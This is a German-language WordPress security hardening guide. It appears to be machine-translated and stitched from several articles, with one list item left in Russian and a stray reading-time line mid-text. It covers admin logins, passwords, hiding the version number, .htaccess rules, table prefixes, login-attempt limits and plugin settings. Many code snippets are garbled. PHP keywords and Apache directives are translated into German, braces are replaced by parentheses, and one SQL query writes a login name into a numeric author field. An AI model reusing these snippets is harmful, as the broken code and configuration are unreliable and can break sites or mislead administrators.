Das WordPress-Admin-Panel wird angegriffen. Was soll ich tun? Zuverlässiger Schutz für WordPress vor Hacking. Verwenden Sie eine sichere Verbindung

Aus dem Artikel erfahren Sie:

1. Verwenden Sie ein gutes Login.

Die Sicherung einer WordPress-Site beginnt mit etwas Grundlegendem – der Erstellung eines guten Logins. Bei der Installation von WordPress verwenden Benutzer häufig den Login, den das Installationsprogramm standardmäßig anbietet, nämlich – Administrator. Dies ist es, worauf Bots zuerst achten, wenn sie auf Ihrer Website nach Sicherheitslücken suchen. Mit diesem Login stellen Sie Hackern bereits die Hälfte der notwendigen Informationen zur Verfügung und diese müssen nur noch das Passwort erraten.

Wenn Sie die Plattform bereits installiert haben und an Ihrer Website arbeiten, möchten Sie die Installation wahrscheinlich nicht deinstallieren und von vorne beginnen, um eine sicherere Anmeldung zu verwenden. Es gibt einen Ausgang:

Schritt 1 – Erstellen Sie einen neuen Benutzer

Melden Sie sich im WordPress-Administrationsbereich an und erstellen Sie ein neues Konto mit einem komplexeren Login, das vollen Zugriff auf alle Funktionen der Website, d. h. Administratorrechte, bietet.

Wählen Sie im Hauptmenü auf der linken Seite aus Benutzer >> Neu hinzufügen.

Geben Sie alle erforderlichen Informationen für den neuen Benutzer ein und definieren Sie seine Rolle als "Administrator" und drücke "Neuen Benutzer hinzufügen".

Schritt 2 – Entfernen des Admin-Benutzers

Melden Sie sich danach vom Verwaltungssystem ab und melden Sie sich mit einem neuen an Konto und löschen Sie den Benutzer Administrator aus dem System auf eine der folgenden Arten:

Methode 1 – Wählen Sie im Hauptmenü auf der linken Seite aus Benutzer >> Alle Benutzer. Bewegen Sie den Mauszeiger über den Benutzernamen Administrator und Sie werden die Funktion sehen "Löschen".

Methode 2 – Wählen Sie im Hauptmenü auf der linken Seite aus Benutzer >> Alle Benutzer. Finden Sie einen Benutzer Administrator, kreuzen Sie es an und aus dem Dropdown-Menü "Aktionen" wählen "Löschen". Klicken Sie anschließend auf die Option "Anwenden" unterhalb der Benutzerliste. Diese Option ist praktisch, wenn Sie mehrere Benutzer gleichzeitig löschen müssen.

Sie können den Admin-Benutzernamen auch über eine Datenbankabfrage ändern:
UPDATE wp_users SET user_login = 'new_login' WHERE user_login = 'admin';

Diese Methode hat einen Nachteil: Der Autor ist für Beiträge zuständig, die vom Benutzer geschrieben wurden Administrator, wird nicht geändert. Um dies zu beheben, müssen Sie eine weitere Abfrage an die Datenbank durchführen:
UPDATE wp_posts SET post_author = 'new_login' WHERE post_author = 'admin';

2. Verwenden Sie ein komplexes und eindeutiges Passwort.

Der Schutz Ihres WordPress-Administrators ist ohne ein sicheres, gutes Passwort natürlich nicht möglich. Es ist wichtig, dass es eindeutig ist und Zahlen, Buchstaben in verschiedenen Groß- und Kleinschreibung, Satzzeichen, Symbole usw. enthält. Passwörter wie: pass, 1q2w3e4r5t6y, 87654321, qwerty, abc123, 111111, 1234, Ihr Geburtsdatum usw. – sind nicht zuverlässig, aber viele Benutzer verwenden sie weiterhin. Ein Beispiel für ein gutes Passwort: pcVaOF8r39. Natürlich wird es für Sie schwierig sein, sich ein solches Passwort zu merken, aber dafür gibt es eine Reihe von Programmen, die Passwörter speichern und generieren und auch in die Oberfläche Ihres Browsers integriert werden können (z. B. Password Agent, KeyPass, Roboform usw.)

Wenn Sie sich Ihre Passwörter dennoch auswendig merken möchten, empfehlen wir Ihnen, ein Kombinationspasswort aus einem Ihnen bekannten Namen/Wort, ein paar Großbuchstaben/Zahlen an zufälligen Stellen und ein paar Sonderzeichen am Anfang oder Ende zu erstellen. Ein solches Passwort ist ebenfalls schwer zu erraten, aber man kann es sich recht gut merken.

Denken Sie daran, Ihre Passwörter regelmäßig zu aktualisieren.

3. Aktualisieren Sie Ihre WordPress-Version.

WordPress kümmert sich um seine Benutzer und deshalb finden Sie Abmeldebenachrichtigungen in Ihrem Admin-Bereich neue Version. Wir empfehlen Ihnen, ein Update durchzuführen, sobald Sie es sehen, da es sich um eine der häufigsten Sicherheitslücken auf Ihrer Website handelt veraltete Version Plattformen.

4. Verstecken Sie die WordPress-Version.

WordPress fügt standardmäßig die aktuelle Versionsnummer hinzu Quelle Ihre Dateien und Seiten. Und da es oft nicht immer möglich ist, die WordPress-Version rechtzeitig zu aktualisieren, kann dies passieren Schwachstelle deine Website. Wenn ein Hacker weiß, welche WordPress-Version Sie haben, kann er großen Schaden anrichten.

Verwenden einer Datei Funktionen.php Sie können verhindern, dass Informationen zu Ihrer Plattformversion angezeigt werden. Dazu müssen Sie die Datei öffnen Funktionen.php, befindet sich im Stammordner des aktuellen Themes Ihrer Website (wp-content/themes/current_theme_wordpress) und fügen Sie den folgenden Code hinzu:
remove_action('wp_head', 'wp_generator');

Oder Sie können der Datei den folgenden Code hinzufügen Funktionen.php:

/* WP-Versionszeichenfolgen aus Skripten und Stilen ausblenden
* @return (string) $src
* @filter script_loader_src
* @filter style_loader_src
*/
Funktion fjarrett_remove_wp_version_strings($src) (
global $wp_version;
parse_str(parse_url($src, PHP_URL_QUERY), $query);
if (!empty($query[‘ver’]) && $query[‘ver’] === $wp_version) (
$src = remove_query_arg('ver', $src);
}
return $src;
}
add_filter('script_loader_src', 'fjarrett_remove_wp_version_strings');
add_filter('style_loader_src', 'fjarrett_remove_wp_version_strings');

/* WP-Versionszeichenfolgen aus Generator-Meta-Tag ausblenden */
Funktion wpmudev_remove_version() (
zurückkehren ";
}
add_filter('the_generator', 'wpmudev_remove_version');

Darüber hinaus finden Sie in jedem WordPress-Themenordner Folgendes header.php Datei. Es zeigt auch die Version Ihrer Installation an, was, wie bereits erwähnt, für einen Hacker sehr interessant ist. Durch Entfernen der folgenden Zeile aus der Datei werden Sie diese unnötigen Informationen los:

” />

5. Laden Sie Themes und Plugins von zuverlässigen Quellen herunter.

WordPress ist so weit verbreitet, dass immer mehr Entwickler fertige Themes und Plugins dafür erstellen. Während die meisten von ihnen die Nutzung Ihrer Website vereinfachen und ihre Funktionalität erweitern, können einige sehr unangenehme Folgen in Form von Viren verbergen und Hackern Tür und Tor öffnen. Verwenden Sie zum Herunterladen von Themes und Plugins nur vertrauenswürdige Ressourcen, zum Beispiel wordpress.org, und achten Sie auch auf alle Warnungen, die vor schädlichen Dateien angezeigt werden. Genau wie bei WordPress selbst ist es wichtig, Ihre Plugins auf dem neuesten Stand zu halten.

6. Speichern Sie keine unnötigen Dateien.

Inaktive Erweiterungen können eine ernsthafte Bedrohung für die Sicherheit Ihrer Website darstellen. Löschen Sie daher gerne alle ungenutzten Plugins und Themes. Sie haben es beispielsweise installiert, um es zu testen und auszuwählen, welches Sie verwenden möchten. Vergessen Sie nach der Auswahl nicht, alle unnötigen zu löschen.

7. Scannen Sie Ihren lokalen Computer regelmäßig auf Viren.

Es ist gut, verschiedene Maßnahmen zu ergreifen, um Ihre WordPress-Site zu sichern, aber Sie müssen auch Ihren Computer im Auge behalten. Sie müssen ein ständig aktualisiertes Antivirenprogramm installiert haben. Andernfalls besteht die Gefahr, dass Ihre Website infiziert wird, indem Sie Virendateien darauf hochladen.

8. Erstellen Sie Sicherungskopien der Site.

Nicht alle böswilligen Angriffe können verhindert werden, aber nur ein erfolgreicher Angriff kann alle Bemühungen zur Arbeit an Ihrer Website zunichte machen. Wir empfehlen Ihnen, regelmäßig Backups Ihrer Website zu erstellen. Viele Hosting-Unternehmen bieten die Möglichkeit von Server-Backups an. Wenn etwas passiert, können Sie die Site anhand der auf dem Server verfügbaren Kopie wiederherstellen.

Durch die Installation des WordPress-Datenbank-Backup-Plugins können Sie die Datenbank Ihrer Website weiter sichern. In den Plugin-Einstellungen können Sie die Option festlegen, eine tägliche Datenbanksicherung an Ihr Kontaktpostfach zu senden.

9. Verwenden Sie eine sichere Verbindung.

Wenn Sie Ihre Dateien lieber über einen FTP-Client hochladen möchten, verwenden Sie ein sicheres Verbindungsprotokoll zum SFTP-Server.

10. Erstellen Sie eine .htaccess-Datei.

Code zum Schutz vor Hotlinking:

RewriteEngine Ein
RewriteCond %(HTTP_REFERER) !^http://(.+\.)?yourdomain\.com/
RewriteCond %(HTTP_REFERER) !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Unter Hotlinking versteht man das Einfügen eines Bildes von Ihrem Server in die Website/den Blog einer anderen Person. Der Datenverkehr geht direkt an Ihren Server.

Mit dem obigen Code können Sie den Server zwingen, zu prüfen, woher genau die Anfrage kam: Wenn sie von den Seiten Ihrer Website stammt, gibt der Server das Bild problemlos an den Benutzer zurück; Wenn es von der Website einer anderen Person stammt, wird ein Bild mit einem Fehler angezeigt.

11. Ändern Sie das Präfix der Datenbanktabellen.

Auch der Schutz von WordPress vor Hackern wird verbessert, wenn das anfängliche Präfix entfernt wird. wp_ — Dadurch wird es für Angreifer schwieriger, Sie zu finden. Betrachten wir verschiedene Möglichkeiten:

Methode 1 – Geeignet für Neuinstallationen über Softaculous
Wenn Ihr Hosting-Anbieter die Verwendung des Softaculous-Skripts zur Installation von WordPress zulässt, können Sie das Präfix während der Erstinstallation ändern: Im Abschnitt „Erweiterte Optionen“ müssen Sie die erforderlichen Änderungen vornehmen.

Methode 2 – Für bereits laufende Websites und neue WordPress-Installationen
Wenn Ihr WordPress schon länger installiert ist und die Site läuft, können Sie das Präfix mit dem Programm phpMyAdmin ändern.

Wählen Sie die gewünschte Datenbank aus der Liste aus und führen Sie die folgende Datenbankabfrage durch:

Benennen Sie die Tabelle „wp_commentmeta“ in „newprefix_commentmeta“ um;
Benennen Sie die Tabelle „wp_comments“ in „newprefix_comments“ um;
Benennen Sie die Tabelle „wp_links“ in „newprefix_links“ um;
Benennen Sie die Tabelle „wp_options“ in „newprefix_options“ um;
Benennen Sie die Tabelle „wp_postmeta“ in „newprefix_postmeta“ um;
Benennen Sie die Tabelle „wp_posts“ in „newprefix_posts“ um;
Benennen Sie die Tabelle „wp_terms“ in „newprefix_terms“ um;
Benennen Sie die Tabelle „wp_term_relationships“ in „newprefix_term_relationships“ um;
Benennen Sie die Tabelle „wp_term_taxonomy“ in „newprefix_term_taxonomy“ um;
UMBENENNEN Sie die Tabelle „wp_usermeta“ in „newprefix_usermeta“;
Benennen Sie die Tabelle „wp_users“ in „newprefix_users“ um;

Wo „newprefix_“ muss durch das neue Präfix ersetzt werden, das Sie anstelle des Präfixes verwenden möchten „wp_“.

Danach sehen Sie das neue Präfix in den Datenbanktabellen:

Um sicherzustellen, dass alle Änderungen erfolgreich waren und das wp_-Präfix nicht mehr in der Tabelle verwendet wird _Optionen Und _usermeta, müssen Sie eine weitere Abfrage an die Datenbank durchführen:

SELECT * FROM `newprefix_options` WHERE `option_name` LIKE '%wp_%'

SELECT * FROM `newprefix_usermeta` WHERE `meta_key` LIKE '%wp_%'

Daher finden Sie möglicherweise eine Reihe von Präfixen, die Sie manuell über die Schaltfläche umbenennen müssen Ändern:

Die Anzahl der Änderungen, die Sie vornehmen müssen, kann variieren. Aber alle Präfixe wp_ Sie müssen zu Ihrem neuen Präfix wechseln, damit die Website ordnungsgemäß funktioniert.

Vergessen Sie danach nicht, auch die Präfixänderungen vorzunehmen wp-config.php Datei:

Sie können auch spezielle Plugins verwenden, um das Datenbankpräfix zu ändern: DB-Präfix ändern oder Tabellenpräfix ändern.

12. Begrenzen Sie die Anzahl der Zugriffsversuche.

In den meisten Fällen unternehmen Angreifer zahlreiche Versuche, auf Ihre Website zuzugreifen, indem sie Ihr Passwort erraten. Sie können das System so konfigurieren, dass eine IP-Adresse nach einer bestimmten Anzahl fehlgeschlagener Anmeldeversuche für mehrere Stunden blockiert wird.

Dazu können Sie zusätzliche Plugins nutzen, zum Beispiel Login LockDown oder Limit Login Attempts. In den Einstellungen dieser Plugins können Sie die Anzahl der Anmeldeversuche und die Sperrzeit unabhängig voneinander festlegen.

Darüber hinaus ist es möglich, die Anzeige einer Meldung auszublenden, dass der eingegebene Benutzername und das eingegebene Passwort falsch sind. Schließlich handelt es sich dabei auch um Informationen, die einem Angreifer helfen können.

Um diese Meldung zu unterdrücken, müssen Sie die Datei öffnen Funktionen.php, befindet sich im aktuellen Theme-Ordner Ihrer Website (wp-content/themes/current_theme_WordPress) und fügen Sie diesen Code hinzu:
add_filter('login_errors',create_function('$a', "return null;"));

13. Entfernen Sie readme.html und License.txt.

Die Dateien „readme.html“ und „licence.txt“ befinden sich im Stammordner jeder WordPress-Installation. Diese Dateien sind für Sie nutzlos, aber sie können Hackern Beweise für ihre Verbrechen liefern. Zum Beispiel, um die aktuelle Version Ihres WordPress herauszufinden und viele andere nützliche Dinge zum Hacken einer Website. Wir empfehlen, sie sofort nach der Installation von WordPress zu entfernen.

14. Verwenden Sie ein SSL-Zertifikat.

Für die Übertragung geschützter Informationen und die Vertraulichkeit des Datenaustauschs empfehlen wir die Verwendung des SSL-Protokolls. Dies gilt insbesondere für Online-Shops, wenn Sie nicht möchten, dass personenbezogene Daten Ihrer Kunden ungesichert übermittelt werden.

Zunächst müssen Sie es für Ihren Domainnamen installieren.

Anschließend können Sie die obligatorische Verwendung des SSL-Protokolls bei der Anmeldung im Control Panel Ihrer Site festlegen. Öffnen Sie dazu wp-config.php Datei im Stammordner Ihrer Website und fügen Sie die folgende Zeile hinzu:
define('FORCE_SSL_ADMIN', true);

15. Bearbeiten Sie die Datei wp-config.php.

Durch Hinzufügen dieses Codes zu wp-config.php Datei können Sie auch den Schutz Ihrer Website verstärken:

Einschränkungen bei Änderungen am Theme und Plugins:
define('DISALLOW_FILE_EDIT', true);

Deaktivieren der Möglichkeit, Plugins zu installieren und zu entfernen:
define('DISALLOW_FILE_MODS', true);

Salzschlüssel oder sogenannte Sicherheitsschlüssel hinzufügen: Zuerst müssen Sie solche Zeilen in finden wp-config.php Datei:

Sie werden sehen, dass die Schlüssel bereits installiert sind und geändert werden können. Oder Sie sehen Zeilen wie diese: „Geben Sie hier Ihre eindeutige Phrase ein“, was darauf hinweist, dass die Schlüssel noch nicht installiert wurden:
/**#@+
* Authentifizierung eindeutiger Schlüssel und Salze.
*
* Ändern Sie diese in verschiedene einzigartige Phrasen!
* Sie können diese mithilfe des Secret-Key-Dienstes (@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org) generieren.
* Sie können diese jederzeit ändern, um alle vorhandenen Cookies ungültig zu machen. Dies führt dazu, dass sich alle Benutzer erneut anmelden müssen.
*
* @seit 2.6.0
*/
define('AUTH_KEY', 'geben Sie hier Ihre eindeutige Phrase ein');
define('SECURE_AUTH_KEY', 'geben Sie hier Ihre eindeutige Phrase ein');
define('LOGGED_IN_KEY', 'geben Sie hier Ihre eindeutige Phrase ein');
define(‘NONCE_KEY’, ‘geben Sie hier Ihre eindeutige Phrase ein’);
define('AUTH_SALT', 'geben Sie hier Ihre eindeutige Phrase ein');
define('SECURE_AUTH_SALT', 'geben Sie hier Ihre eindeutige Phrase ein');
define('LOGGED_IN_SALT', 'geben Sie hier Ihre eindeutige Phrase ein');
define(‘NONCE_SALT’, ‘fügen Sie hier Ihre eindeutige Phrase ein’);

Einige Plugins möchte ich gesondert erwähnen:

Hierbei handelt es sich um ein WordPress-Sicherheits-Plugin, mit dem Sie Ihre Website auf bösartigen Code sowie von Hackern hinterlassene Lücken und Schlupflöcher scannen und Website- und Verkehrsanalysen in Echtzeit anzeigen können. Es ist auch möglich, automatisches Scannen und vieles mehr zu konfigurieren.

Dieses Plugin überprüft Ihre Website auf verschiedene Sicherheitslücken und bietet eine Reihe von Methoden zu deren Behebung. Zum Beispiel Passwörter, unterschiedliche Dateizugriffsrechte, Datenbankschutz, Schutz der WordPress-Versionsinformationen, Administratorschutz usw.

Mit diesem Plugin können Sie Benutzerkonten und Anmeldungen, Datenbanken und Dateisysteme sichern, Brute-Force-Angriffe (Angriffe zum Erraten von Passwörtern) verhindern, die Website scannen usw.

So traurig es auch klingen mag, der Schutz von WordPress ist eine komplexe Angelegenheit und die in diesem Artikel beschriebenen Methoden garantieren nicht zu 100 %, dass Ihre Website vollständig vor den Aktionen von Betrügern geschützt ist. Sie sollten sie jedoch nicht vernachlässigen, da sie die Möglichkeit, dass Hacker die Website hacken, erheblich verringern.

WordPress ist ein sehr beliebtes CMS, das ist zweifellos sein Vorteil, es gibt viele Plugins für jede Aufgabe, aber das ist auch seine Schwäche, denn je beliebter das CMS für eine Website, desto mehr Angriffe gibt es darauf, oder besser gesagt, es ist so Für einen Angreifer interessanter, da nach dem Auffinden einer Schwachstelle in WordPress Hunderttausende Websites für Angreifer verfügbar werden. Daher erfordert der Schutz Ihrer WordPress-Site besondere Aufmerksamkeit.

Warum werden WordPress-Seiten gehackt?

Alle gängigen CMS (Website-Engines) werden gehackt, und WordPress ist keine Ausnahme. Ich hacke hauptsächlich mit sogenannten Programmen (Skripten) – Exploits, um die Kontrolle über die Website zu erlangen. Dies geschieht hauptsächlich, um Links von Ihrer Website zu anderen Ressourcen zu erstellen , und um ein BotNet zu erstellen, das DDoS-Angriffe auf andere Server ausführt, während die Site funktionsfähig bleibt und Sie mit bloßem Auge nie erkennen können, dass sie infiziert ist. In jedem Fall wird der Hack negative Auswirkungen auf Ihre Website haben und Sie könnten sogar aus den Suchergebnissen verschwinden.

Wie ich bereits sagte, erfolgt das Hacken automatisch, das CMS einer Site zu identifizieren ist nicht schwierig, es gibt viele Online-Dienste dafür, oft versucht ein angreifendes Programm, das Passwort aus dem administrativen Teil der Site zu erraten, d.h. Gehen Sie zur Adresse your-site.ru/wp-admin und versuchen Sie, das Passwort für Ihren Benutzer zu erraten. Den Benutzernamen herauszufinden ist nicht schwierig. Sie schreiben Artikel darunter, damit der Login für Bots sichtbar ist und sie wissen, wohin Such danach. es sei denn, Sie haben es natürlich mit einem Plugin geschlossen, über eines davon werden wir weiter unten sprechen. Das Passwort für den Site-Administrator sollte sehr komplex sein, aber selbst wenn diese Bedingung erfüllt ist, können Sie nicht zulassen, dass Bots (Brute Force) das Passwort für das „Admin-Panel“ ausprobieren, da dies keine notwendige Belastung für den Server darstellt Mehrere Dutzend Bots aus verschiedenen Teilen der Welt tun dies.

Plugin zum Schutz von WordPress vor Angriffen

Kommen wir direkt zum Plugin, es gibt mehrere, die es wert sind, in Betracht gezogen zu werden. Lassen Sie uns über ein einfacheres und verständlicheres sprechen. Ich verwende es in vielen meiner Projekte. Für Kunden meistert es die zugewiesenen Aufgaben zum Schutz der Website sehr gut.

Dieses Plugin ist recht einfach zu erlernen und zu 90 % russifiziert. Es wird wie jedes Plugin aus dem WordPress-Repository installiert. Nach der Installation müssen Sie es aktivieren und Grundeinstellungen vornehmen. Es erscheint im Hauptmenü im WordPress-Administrationsbereich

WP-Sicherheits-Plugin-Systemsteuerung

Nachdem wir zu den Plugin-Einstellungen gegangen sind, gelangen wir zur Systemsteuerung. Hier können Sie grundlegende wichtige Einstellungen vornehmen.

  1. Zeigt die letzten 5 Berechtigungen in Ihrem Admin-Panel an, der Benutzer und die IP-Adresse sind angegeben, zum Beispiel sehe ich sofort meine IPs, es sind nur zwei davon, also habe ich keinen Zweifel, dass jemand anderes mein Passwort aus dem administrativen Teil kennt.
  2. Der Abschnitt mit den wichtigsten Funktionen, hier müssen Sie alles einbeziehen und mit allem einverstanden sein.
  3. Das Plugin ist in der Lage, Dateiänderungen auf dem Hosting zu verfolgen, und es kann Ihnen einen Bericht per E-Mail senden, und Sie wissen immer, welche Dateien geändert wurden. Dies ist sehr nützlich, wenn Sie ein Skript oder eine Datei heruntergeladen haben Bei bösartigem Code sehen Sie ihn sofort im Bericht. Der einzige Nachteil ist, dass WP Security nach der Aktualisierung aller anderen von Ihnen installierten Plugins oder der WordPress-Engine selbst alle diese Änderungen sieht und Ihnen eine riesige Liste sendet, die Sie aber erhalten können Sie sind an diese Berichte gewöhnt, da Sie wissen, wann Sie die Dateien selbst aktualisiert haben.
  4. Dieses Element ändert die Standardadresse des Site-Admin-Panels yoursite.ru/wp-admin in yoursite.ru/luboe-slovo. Dadurch wird Ihr Admin-Panel vor einigen Möchtegern-Hackern und Bots geschützt, aber leider nicht vor allen , vor allem Fortgeschrittene finden es immer noch, ich kann das beurteilen, indem ich mir den Abschnitt „Berechtigungen“ ansehe, aber dazu später mehr.
  5. Dieses Element sollte deaktiviert sein, da es wie im Screenshot nur dann benötigt wird, wenn Sie die Site in den Wartungsmodus versetzen möchten. Besucher erhalten ein Schild mit der Meldung, dass an der Site technische Arbeiten durchgeführt werden. Manchmal ist dies beispielsweise nützlich Vergessen Sie beim Ändern des Designs der Website oder bei einigen globalen Änderungen nicht, dass Suchroboter in diesem Modus Ihre Website auch nicht anzeigen können. Schließen Sie sie nicht für längere Zeit.

Schutz des WordPress-Administrationsbereichs vor dem Erraten von Passwörtern

Gehen wir nun zum Menüpunkt „Autorisierung“, meiner Meinung nach ein sehr nützlicher Punkt, und es lohnt sich, ihn einzurichten, da er auf einer meiner Websites verfügbar ist. Bei einer Anwesenheit von etwa 1000 Personen fängt das Plugin täglich Dutzende Versuche ab, das Passwort für das Admin-Panel zu erraten, und fügt die IP-Adressen von Hackern zur Blacklist hinzu, d. h. blockiert es vollständig, die Site reagiert nicht mehr auf diese IP-Adresse, wodurch Versuche, ein Passwort zu finden, zunichte gemacht werden, die Einstellungen, die ich auf dem Bildschirm vornehme.

  1. Ich belasse die Anzahl der Versuche, einen „Fehler zu machen“, bei -3, machen Sie nicht weniger, sonst könnten Sie selbst das Passwort falsch eingeben und mit Ihrer IP auf der schwarzen Liste landen, das müssen Sie
  2. Dies ist die Zeit, nach der der Zähler fehlerhafter Anmeldeversuche zurückgesetzt wird.
  3. Ich stelle die Sperrfrist für IP-Adressen, von denen aus fehlerhafte Autorisierungsversuche durchgeführt wurden, länger ein, in Minuten, d. h. Ich habe lange gebadet, der Screenshot zeigt 6.000.000 Minuten, das sind etwa 11 Jahre, ich denke, das reicht

Allen blockierten IPs wird der Zugriff nicht nur auf das Admin-Panel, sondern auf die gesamte Website verweigert. Beachten Sie dies

Liste der blockierten IP-Adressen

  1. IP-Adresse des Angreifers
  2. Der Login, für den das Passwort ausgewählt wurde, ist übrigens korrekt
  3. Datum, an dem die automatische Sperrung vorgenommen wurde

Weiße Liste der Adressen für das Admin-Panel

Um den Zugriff auf den administrativen Teil einer WordPress-Site nur von bestimmten IP-Adressen aus zu ermöglichen, können Sie in den Plugin-Einstellungen die Whitelist der Adressen aktivieren.

  1. Aktivieren dieser Option
  2. Hier ist Ihre aktuelle IP-Adresse
  3. Geben Sie in diesem Feld alle IP-Adressen ein, von denen der Zugriff auf das Admin-Panel erlaubt ist

Wenn Sie einen Bereich von IP-Adressen angeben müssen, verwenden Sie anstelle einer Nummer ein Sternchen, zum Beispiel 192.168.5.* – dieses Design ermöglicht den Zugriff auf das WordPress-Admin-Panel von allen IPs, die mit diesen Nummern beginnen, diese Methode kann nützlich sein für diejenigen, die keine dedizierte IP-Adresse haben und diese sich ständig ändert, zum Beispiel bei der Arbeit mit mobilem Internet, in der Regel bleibt der Bereich innerhalb der ersten beiden Ziffern, also zum Beispiel 192.168.* .*

Lesezeit: 4 Min

Noch vor einem Jahr überstieg die Auslastung meines Servers sehr häufig die vom Tarif erlaubte Grenze. Darüber hinaus lag das Problem nicht in den Websites selbst, sondern in einem banalen Angriff von Angreifern auf das Admin-Panel, um sich für einige ihrer eigenen Zwecke Zugriff zu verschaffen.

Heute erzähle ich Ihnen, wie ich mit dem Problem umgegangen bin. Ich empfehle Ihnen, dies für alle Fälle zu Hause zu tun.

Aus diesem Grund wurde beschlossen, die Adresse des Anmeldeformulars im Admin-Panel zu ändern und das Admin-Panel für alle Fremden zu schließen, die nicht über meine IP verfügen.

Es ist erwähnenswert, dass einige Hosting-Unternehmen selbst automatisch eine neue Admin-Adresse für alle Benutzer erstellt haben. Wenn Sie die Dienste solcher Hosting-Dienste nutzen, lesen Sie keine weiteren Artikel und verschwenden Sie keine Zeit.

So ändern Sie die WordPress-Administratoradresse

Ich habe bereits einen solchen Artikel veröffentlicht. Hier scheint es ein ähnliches Ergebnis zu geben, die Wirkung und der Zweck sind jedoch unterschiedlich.

Vergessen Sie nicht, Sicherungskopien der Dateien zu erstellen, mit denen Sie arbeiten.

  • Kopieren Sie zunächst die Datei wp-login.php aus dem Stammverzeichnis der Site (wo sich wp-config.php befindet) per FTP auf Ihren Computer.
  • Benennen Sie es nach Belieben um. Zum Beispiel vhod.php
  • Öffnen Sie diese Datei mit dem kostenlosen Programm Notepad++ (oder einem anderen Programm, das Sie bequemer bearbeiten können) und ersetzen Sie alle Vorkommen des Ausdrucks wp-login.php durch vhod.php.

Sie können dies schnell tun, indem Sie in Notepad++ STRG+F drücken. Geben Sie im angezeigten Fenster Folgendes ein:

Also ersetzte ich in einer Sekunde das Vorkommen der Phrase, die ich brauchte, in der gesamten Datei. Es kam 12 Mal vor.

Wir laden die neue Datei auf FTP hoch.

Ähnliches muss in der Datei general-template.php durchgeführt werden, die Sie im Ordner wp-includes direkt dort auf FTP finden. Diese. Ändern Sie das Vorkommen der Phrase wp-login.php in vhod.php, aber ändern Sie nicht den Dateinamen selbst!

Jetzt haben Sie dort im Stammverzeichnis der Site eine .htaccess-Datei. Wir kopieren es auch auf unseren Computer und öffnen es zur Bearbeitung (Sie können einen normalen Windows-Notizblock verwenden). Wir fügen einen Code ein, der den Zugriff auf die Datei wp-login.php für alle blockiert

Befehl Verweigern, Erlauben Verweigern von allen

< Files wp - login . php >

Befehl verweigern, zulassen

Abgelehnt von allen

< / Files >

Es war dieser Schritt, der die Belastung erleichterte und auch das Autorisierungsformular verbarg. Die Belastung wurde durch das Einfügen des präsentierten Codes in .htaccess erleichtert: Wenn http://site.ru/wp-login.php aufgerufen würde, würde ein 403-Fehler ausgegeben, kein 404.

Wiederholen wir kurz den Betriebsalgorithmus:

  • Benennen Sie die Datei wp-login.php in einen beliebigen Namen um und ersetzen Sie die Vorkommen des Namens durch einen neuen.
  • Ebenso ersetzen wir in der Datei general-template.php den alten Namen wp-login.php durch den neuen.
  • Wir registrieren in der .htaccess-Datei ein Zugriffsverbot für wp-login.php für alle

Nach dem Update von WordPress muss nur noch die Datei general-template.php korrigiert werden. Aber weil Die Engine wird nicht sehr oft aktualisiert – das ist im Vergleich zum Effekt eine Kleinigkeit.

Wir haben eine Einschränkung für die Anmeldung über IP über .htaccess festgelegt

Als zusätzliche Maßnahme zum Schutz der Seite habe ich eine Einschränkung für die Anmeldung im Admin-Bereich über IP eingeführt. Das Problem wurde ganz einfach gelöst: Erstellen Sie eine leere .htaccess-Datei und fügen Sie den folgenden Code hinzu

Befehl verweigern, zulassen, zulassen von 192.168.0.1, von allen verweigern

Befehl verweigern, zulassen

ab 192.168.0.1 zulassen

abgelehnt von allen

Wir speichern die Datei und legen sie im wp-admin-Ordner an derselben Stelle im Stammverzeichnis der Site ab.

Geben Sie anstelle meiner IP aus dem Beispiel Ihre echte ein. Darüber hinaus können Sie mehrere IPs mit jeweils einer neuen Zeile hinzufügen:

Befehl verweigern, zulassen, zulassen von 126.142.40.16, zulassen von 195.234.69.6, verweigern von allen

Befehl verweigern, zulassen

zulassen ab 126.142.40.16

ab 195.234.69.6 zulassen

abgelehnt von allen

Wenn die IP dynamisch ist, können Sie Zahlen nur bis zum ersten, zweiten oder dritten Punkt eingeben:

Sie wissen wahrscheinlich schon, wie Sie in den WordPress-Administrationsbereich gelangen?

Sie können dies auf mindestens vier Arten tun, indem Sie Folgendes zu Ihrer Site-Adresse hinzufügen:

  1. /admin, d.h. so: http://yoursite/admin
  2. /wp-admin
  3. /Anmeldung
  4. /wp-login.php

Im Allgemeinen führen Sie alle ersten drei Weiterleitungsoptionen weiterhin zur Seite: http://your_site/wp-login.php

Es stellt sich heraus, dass jeder der Adresse Ihrer Site jedes der vier oben beschriebenen Präfixe hinzufügen kann und das Administrator-Login sehen wird:

Dies bedeutet natürlich keineswegs, dass jeder problemlos in das Admin-Panel gelangen kann, da er auch den Benutzernamen oder Ihre E-Mail-Adresse und Ihr Passwort kennen muss.

Wenn Ihr Administratorbenutzer über ein Login verfügt: – dann ist dies von Ihrer Seite überhaupt nicht umsichtig und der Angreifer muss nur Ihr Passwort erraten oder erraten.

Außerdem haben Sie die Aufschrift gesehen: Benutzername oder E-Mail? Ja, ja, WordPress kann E-Mail als Benutzernamen verwenden. Sie können jedoch irgendwo auf der Website eine E-Mail-Adresse angeben, die mit der E-Mail-Adresse des Administratorbenutzers übereinstimmt. Es stellt sich heraus, dass ein Angreifer als erstes versuchen kann, Ihre E-Mail-Adresse einzugeben, und dann hilft ihm WordPress erneut, denn wenn die E-Mail nicht geeignet ist, wird ihm diese Meldung angezeigt:

und wenn die E-Mail korrekt ist, schreibt WordPress, dass das Passwort dafür falsch ist:

Infolgedessen haben wir eine Situation, in der ein potenzieller Angreifer, um Ihre Website zu hacken (Zugriff auf das Admin-Panel), nur Ihr Passwort erraten oder erraten muss.

Wie schützt man den Administrator-Login vor einer potenziellen Bedrohung? Die Antwort ist einfach: Versuchen Sie, die Anzahl der für die Eingabe erforderlichen Unbekannten zu erhöhen.

Schauen wir uns nun genauer um:

  1. Stellen Sie nach Möglichkeit sicher, dass die E-Mail-Adresse des Administratorbenutzers nirgendwo auf der Website erwähnt wird – die öffentliche E-Mail-Adresse sollte eine andere sein.
  2. Ваш пароль должен быть не простым, при установке WordPress сам генерирует для вас сложный пароль, если не хотите его использовать придумайте какой-нибудь более менее сложный пароль, включающий в себя маленькие и большие символы, цифры и какие-нибудь символы типа -, ?, _ usw.
  3. Auch Ihr Benutzername sollte nicht einfach sein: Admin, Manager, Root, Administrator, Benutzer und andere einfache Worte!
  4. Und schließlich müssen Sie die drittwichtigste Unbekannte eingeben – die Admin-Login-URL ändern, dazu installieren Sie ein einfaches Plugin: WPS Hide Login
WPS-Anmeldung ausblenden

